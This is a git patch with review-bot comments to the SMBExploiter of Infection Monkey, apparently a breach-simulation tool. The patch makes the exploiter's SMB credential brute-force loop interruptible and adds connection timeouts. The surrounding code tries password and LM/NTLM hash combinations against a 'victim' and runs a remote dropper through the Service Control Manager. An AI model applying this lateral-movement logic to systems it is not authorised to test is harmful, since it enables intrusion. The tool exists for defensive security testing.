From ed817feaf26e372ea8969cbcd1cdc5e9e6b9644e Mon Sep 17 00:00:00 2001
From: Mike Salvatore
Date: Mon, 21 Mar 2022 14:11:21 -0400
Subject: [PATCH] Agent: Make SMBExploiter interruptible
---
 monkey/infection_monkey/exploit/smbexec.py | 19 ++++++++++++-------
 1 file changed, 12 insertions(+), 7 deletions(-)
diff --git a/monkey/infection_monkey/exploit/smbexec.py b/monkey/infection_monkey/exploit/smbexec.py
index 31a8dbb53..72cc1a6cb 100644
--- a/monkey/infection_monkey/exploit/smbexec.py
+++ b/monkey/infection_monkey/exploit/smbexec.py
@@ -3,6 +3,7 @@ from logging import getLogger
 from impacket.dcerpc.v5 import scmr, transport
 from impacket.dcerpc.v5.scmr import DCERPCSessionError
+from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
 from common.utils.attack_utils import ScanStatus, UsageEnum
 from infection_monkey.exploit.HostExploiter import HostExploiter
 from infection_monkey.exploit.tools.helpers import get_agent_dest_path
@@ -14,6 +15,7 @@ from infection_monkey.utils.brute_force import (
 get_credential_string,
 )
 from infection_monkey.utils.commands import build_monkey_commandline
+from infection_monkey.utils.threading import interruptable_iter
 logger = getLogger(__name__)
@@ -33,7 +35,7 @@ class SMBExploiter(HostExploiter):
 dest_path = get_agent_dest_path(self.host, self.options)
 creds = generate_brute_force_combinations(self.options["credentials"])
- for user, password, lm_hash, ntlm_hash in creds:
+ for user, password, lm_hash, ntlm_hash in interruptable_iter(creds, self.interrupt):
 creds_for_log = get_credential_string([user, password, lm_hash, ntlm_hash])
 try:
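Review bot: The `interruptable_iter(creds, self.interrupt)` wrapper checks the interrupt only between credential attempts, so an attempt already inside the `try:` body (which continues outside this hunk) runs to completion before the loop stops; worth stating at the loop so nobody expects an immediate stop: `# interrupt is honoured between attempts; an in-flight SMB login is not cut short`. How long a single attempt can block depends on the connection code in that body, which this hunk does not show.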
@@ -76,8 +78,12 @@ class SMBExploiter(HostExploiter):
 continue
 if not self.exploit_result.exploitation_success:
- logger.debug("Exploiter SmbExec is giving up...")
- self.exploit_result.error_message = "Failed to authenticate to the victim over SMB"
+ if self._is_interrupted():
+ self._set_interrupted()
+ else:
+ logger.debug("Exploiter SmbExec is giving up...")
+ self.exploit_result.error_message = "Failed to authenticate to the victim over SMB"
+
 return self.exploit_result
 # execute the remote dropper in case the path isn't final
@@ -94,9 +100,10 @@ class SMBExploiter(HostExploiter):
 "monkey_path": remote_full_path
 } + build_monkey_commandline(self.host, self.current_depth - 1)
- smb_conn = False
+ smb_conn = None
 for str_bind_format, port in SMBExploiter.KNOWN_PROTOCOLS.values():
 rpctransport = transport.DCERPCTransportFactory(str_bind_format % (self.host.ip_addr,))
+ rpctransport.set_connect_timeout(LONG_REQUEST_TIMEOUT)
 rpctransport.set_dport(port)
 rpctransport.setRemoteHost(self.host.ip_addr)
 if hasattr(rpctransport, "set_credentials"):
@@ -116,6 +123,7 @@ class SMBExploiter(HostExploiter):
 logger.debug(f"Connected to SCM on exploited machine {self.host}, port {port}")
 smb_conn = rpctransport.get_smb_connection()
+ smb_conn.setTimeout(LONG_REQUEST_TIMEOUT)
 break
 if not smb_conn:
@@ -126,9 +134,6 @@ class SMBExploiter(HostExploiter):
 return self.exploit_result
- # TODO: We DO want to deal with timeouts
- # We don't wanna deal with timeouts from now on.
- smb_conn.setTimeout(100000)
 scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
 resp = scmr.hROpenSCManagerW(scmr_rpc)
 sc_handle = resp["lpScHandle"]
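Review bot: In the `if not self.exploit_result.exploitation_success:` block the interrupted branch returns silently while the give-up branch logs, so an interrupted run leaves no trace in the agent log of why SMB exploitation stopped; `logger.debug("Exploiter SmbExec was interrupted")` next to `self._set_interrupted()` would mirror the existing message. Whether `_set_interrupted()` also fills `exploit_result.error_message` is not visible here — if it does not, callers reading that field for an interrupted host get the unset value, which is worth confirming. The enclosing method continues outside the hunk.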
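Review bot: The protocol loop `for str_bind_format, port in SMBExploiter.KNOWN_PROTOCOLS.values():` is not wrapped in `interruptable_iter` the way the credential loop is, so an interrupt arriving during the SCM connection phase is only noticed once every protocol has been tried; `for str_bind_format, port in interruptable_iter(SMBExploiter.KNOWN_PROTOCOLS.values(), self.interrupt):` keeps the two loops consistent, and the `if not smb_conn:` branch that ends the next hunk (its body lies between the hunks) would then need the same `_is_interrupted()` distinction as the authentication-failure path. Also, `set_connect_timeout` is applied to the generic transport here, whereas the SMB connection's own timeout is set only after `get_smb_connection()` in the next hunk; whether the SMB transport variant honours the connect timeout for the handshake is not visible on this page and is worth confirming, since an unbounded connect would defeat the interruptibility this patch adds. The connection loop body continues outside the hunk.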